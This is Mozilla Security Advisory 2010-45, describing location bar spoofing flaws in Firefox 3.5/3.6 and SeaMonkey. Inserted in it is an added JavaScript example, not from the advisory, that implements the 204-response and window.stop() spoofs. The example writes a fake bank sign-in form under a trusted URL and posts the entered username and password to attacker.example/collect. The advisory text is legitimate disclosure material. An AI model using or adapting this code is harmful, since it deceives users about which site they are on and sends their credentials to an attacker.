Mozilla Foundation Security Advisory 2010-45
Multiple location bar spoofing vulnerabilities
- Announced: July 20, 2010
- Reporter: Michal Zalewski, Jordi Chancel
- Impact: Moderate
- Products: Firefox, SeaMonkey
- Fixed in:
        - Firefox 3.5.11
        - Firefox 3.6.7
        - SeaMonkey 2.0.6
Description
Google security researcher Michal Zalewski
reported two methods for spoofing the contents of the location bar.
The first method works by opening a new window on a resource
that responds with HTTP 204 (No Content) and then using the
reference to the new window to insert HTML content into the blank
document. The second method does not require that the
resource opened in the new window respond with 204: it works as long as the
opener calls window.stop() before the document has loaded, since the
location bar already shows the requested URL while the document is still blank.
In either case a user could be misled as to the true location of
the document they are viewing.
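The two window-reference methods described above, as an added example that is not code from the advisory or from the reporter. The spoof is written as functions that take the opener's window object, so the call sequence can be exercised outside a browser; the hostnames, the paths, the assumption that a 204-responding endpoint exists on the site being impersonated (the spoof is only meaningful when the blank document's URL belongs to that site), and the reading of "the opener calls window.stop()" as a stop() on the new window reference are all assumptions of this example.

```javascript
// Added example (not from the advisory): the two window-reference spoofs,
// expressed as functions that take the opener's window object. Hostnames,
// paths and the existence of a 204 endpoint on bank.example are assumptions.

// A resource on the impersonated site that answers 204 No Content (assumed).
const NO_CONTENT_URL = 'http://bank.example/beacon';

// Markup the attacker writes into the blank document; it imitates a login
// form for whatever URL the location bar is showing.
function spoofHtml(shownUrl) {
  return '<html><body><h1>Sign in at ' + shownUrl + '</h1>' +
    '<form method="post" action="http://attacker.example/collect">' +
    '<input name="user"><input type="password" name="pass">' +
    '<input type="submit" value="Sign in"></form></body></html>';
}

// Replace the contents of a window's document with attacker-chosen markup.
function writeInto(win, html) {
  win.document.open();
  win.document.write(html);
  win.document.close();
}

// Method 1: open a window on a resource that responds 204. The affected
// browsers kept that URL in the location bar while leaving the document
// blank, so the opener can fill it in through the window reference.
function spoofViaNoContent(opener, url) {
  const w = opener.open(url);
  writeInto(w, spoofHtml(url));
  return w;
}

// Method 2: open a window on any URL and stop the load before the document
// arrives (assumed reading of "the opener calls window.stop()": stop() on the
// new window). The location bar already shows the requested URL while the
// document is still blank, so the same write trick applies.
function spoofViaStop(opener, url) {
  const w = opener.open(url);
  w.stop();
  writeInto(w, spoofHtml(url));
  return w;
}
```

In a browser, `spoofViaNoContent(window, NO_CONTENT_URL)` or `spoofViaStop(window, 'http://bank.example/login')` would be called from the attacker's page; the new window then shows the bank.example URL above attacker-written markup on an affected version.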
Security researcher Jordi Chancel reported that
the location bar could be spoofed to look like a secure page when the
current document was served via plaintext. The vulnerability is
triggered by a server that first redirects a request for a plaintext
resource to another resource behind a valid SSL/TLS certificate. When a
second request for the original plaintext resource is
answered not with a redirect but with JavaScript
containing history.back()
and history.forward(), the plaintext
resource is displayed with valid SSL/TLS badging in the location
bar.